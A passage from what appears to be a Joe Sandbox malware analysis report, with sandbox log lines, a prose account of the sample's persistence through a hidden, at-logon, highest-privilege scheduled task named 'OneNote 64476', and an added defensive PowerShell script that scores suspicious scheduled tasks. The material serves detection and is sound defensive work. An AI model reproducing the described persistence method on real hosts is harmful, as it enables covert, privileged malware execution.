    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 7_2_00007FFD9BA1621C push eax; ret 7_2_00007FFD9BA1627A
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 7_2_00007FFD9BA161F3 push eax; ret 7_2_00007FFD9BA1627A
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 7_2_00007FFD9BA1625C push eax; ret 7_2_00007FFD9BA1627A
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 7_2_00007FFD9BA17938 push ebx; retf 7_2_00007FFD9BA1796A
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 7_2_00007FFD9BA1785E push eax; iretd 7_2_00007FFD9BA1786D
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 7_2_00007FFD9BA1776A pushad ; iretd 7_2_00007FFD9BA1785D
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 8_2_00007FFD9B90D2A5 pushad ; iretd 8_2_00007FFD9B90D2A6
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 8_2_00007FFD9BA2386C push cs; ret 8_2_00007FFD9BA238CA
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 8_2_00007FFD9BAF2363 push 8B485F91h; iretd 8_2_00007FFD9BAF236B
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 13_2_00007FFD9B8DD2A5 pushad ; iretd 13_2_00007FFD9B8DD2A6
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 13_2_00007FFD9B9F795D push ebx; retf 13_2_00007FFD9B9F796A
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 13_2_00007FFD9BAC2333 push 8B485F94h; iretd 13_2_00007FFD9BAC233B
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 24_2_00007FFD9B8CD2A5 pushad ; iretd 24_2_00007FFD9B8CD2A6
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 24_2_00007FFD9B9E8974 push edi; ret 24_2_00007FFD9B9E8982
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 24_2_00007FFD9B9E8904 push edx; ret 24_2_00007FFD9B9E8912
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 24_2_00007FFD9B9E8954 push esi; ret 24_2_00007FFD9B9E8962
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 24_2_00007FFD9B9E8928 push esp; ret 24_2_00007FFD9B9E8932
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 24_2_00007FFD9B9E8921 push ebx; ret 24_2_00007FFD9B9E8922
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 24_2_00007FFD9B9E893A push esi; ret 24_2_00007FFD9B9E8942
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 24_2_00007FFD9BAB1CFE push eax; ret 24_2_00007FFD9BAB1CFF
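    The process-creation entries above record the sample's persistence mechanism: a hidden PowerShell child first checks whether any registered task action already references the dropped path (the boolean lands in the console window title rather than on stdout), then Register-ScheduledTask creates 'OneNote 64476' as a hidden, at-logon, RunLevel Highest task with no execution time limit that runs a .cmd out of the user's Roaming profile. The push/ret "Code function" entries, by contrast, are located inside powershell.exe (processes 7, 8, 13 and 24), not in file.exe, so they say nothing about the sample's own code. The hunting script below is an added example, not part of the Joe Sandbox report or of the sample; it walks every registered task on a host and scores the traits this registration combines. The path patterns, the task-name heuristic and the score weights are assumptions to tune for your own estate.

```powershell
# Added example (not from the report or the sample): score scheduled tasks that look like the
# "OneNote 64476" registration observed in the sandbox. Run elevated so Get-ScheduledTask can
# enumerate every task folder. Patterns, weights and the name heuristic are assumptions.
function Get-SuspiciousScheduledTask {
    [CmdletBinding()]
    param(
        # Action paths matching any of these regexes count as user-writable (assumed list).
        [string[]]$UserWritablePattern = @(
            '\\Users\\[^\\]+\\AppData\\(Roaming|Local)\\',
            '\\Users\\[^\\]+\\(Desktop|Downloads|Documents)\\',
            '\\ProgramData\\',
            '\\Windows\\Temp\\'
        ),
        [string[]]$ScriptExtension = @('.cmd', '.bat', '.ps1', '.vbs', '.js', '.hta'),
        [int]$MinimumScore = 3
    )

    foreach ($task in Get-ScheduledTask -ErrorAction SilentlyContinue) {
        $isLogonTrigger = [bool]($task.Triggers |
            Where-Object { $_.CimClass.CimClassName -eq 'MSFT_TaskLogonTrigger' })

        foreach ($action in $task.Actions) {
            # COM-handler actions carry no Execute path; only MSFT_TaskExecAction does.
            if ([string]::IsNullOrWhiteSpace($action.Execute)) { continue }

            $exe     = [Environment]::ExpandEnvironmentVariables($action.Execute).Trim('"')
            $ext     = ([IO.Path]::GetExtension($exe)).ToLowerInvariant()
            $reasons = New-Object System.Collections.Generic.List[string]
            $score   = 0

            if ($UserWritablePattern | Where-Object { $exe -match $_ }) {
                $score += 2; $reasons.Add('action runs from a user-writable directory')
            }
            if ($ScriptExtension -contains $ext) {
                $score += 1; $reasons.Add('action is a script rather than a signed binary')
            }
            if ($task.Principal.RunLevel -eq 'Highest') {
                $score += 1; $reasons.Add('RunLevel Highest')
            }
            if ($task.Settings.Hidden) {
                $score += 1; $reasons.Add('task is hidden')
            }
            # New-ScheduledTaskSettingsSet -ExecutionTimeLimit 0 is stored as PT0S (no limit),
            # which is what a long-running miner needs.
            if ($task.Settings.ExecutionTimeLimit -eq 'PT0S') {
                $score += 1; $reasons.Add('no execution time limit')
            }
            if ($isLogonTrigger) {
                $score += 1; $reasons.Add('runs at logon')
            }
            # Heuristic (assumption): a product-like word followed by a bare number, e.g. "OneNote 64476".
            if ($task.TaskName -match '^[A-Za-z]+ \d{3,}$') {
                $score += 1; $reasons.Add('name mimics a product with a numeric suffix')
            }
            if ($action.Arguments -match '-w(indowstyle)?\s+hidden') {
                $score += 1; $reasons.Add('hidden PowerShell window requested')
            }

            if ($score -ge $MinimumScore) {
                [pscustomobject]@{
                    TaskName  = $task.TaskName
                    TaskPath  = $task.TaskPath
                    Execute   = $exe
                    Arguments = $action.Arguments
                    RunAs     = $task.Principal.UserId
                    Score     = $score
                    Reasons   = ($reasons -join '; ')
                }
            }
        }
    }
}

# Usage: highest-scoring tasks first. Verify each hit before touching it.
Get-SuspiciousScheduledTask | Sort-Object Score -Descending | Format-Table -AutoSize
# Once a hit is confirmed malicious, remove the task and the action file it points at, e.g.:
# Unregister-ScheduledTask -TaskName 'OneNote 64476' -Confirm:$false
```

    For the same behaviour in logs rather than on the live host: the Register-ScheduledTask command line is captured verbatim by PowerShell script block logging (Microsoft-Windows-PowerShell/Operational event 4104), the registration itself appears as Microsoft-Windows-TaskScheduler/Operational event 106 and, when "Audit Other Object Access Events" is enabled, as Security event 4698, whose XML body contains the same action path and RunLevel the script scores above.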

    Hooking and other Techniques for Hiding and Protection

    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
    Source: C:\Users\user\Desktop\file.exe | Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\cmd.exe | Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
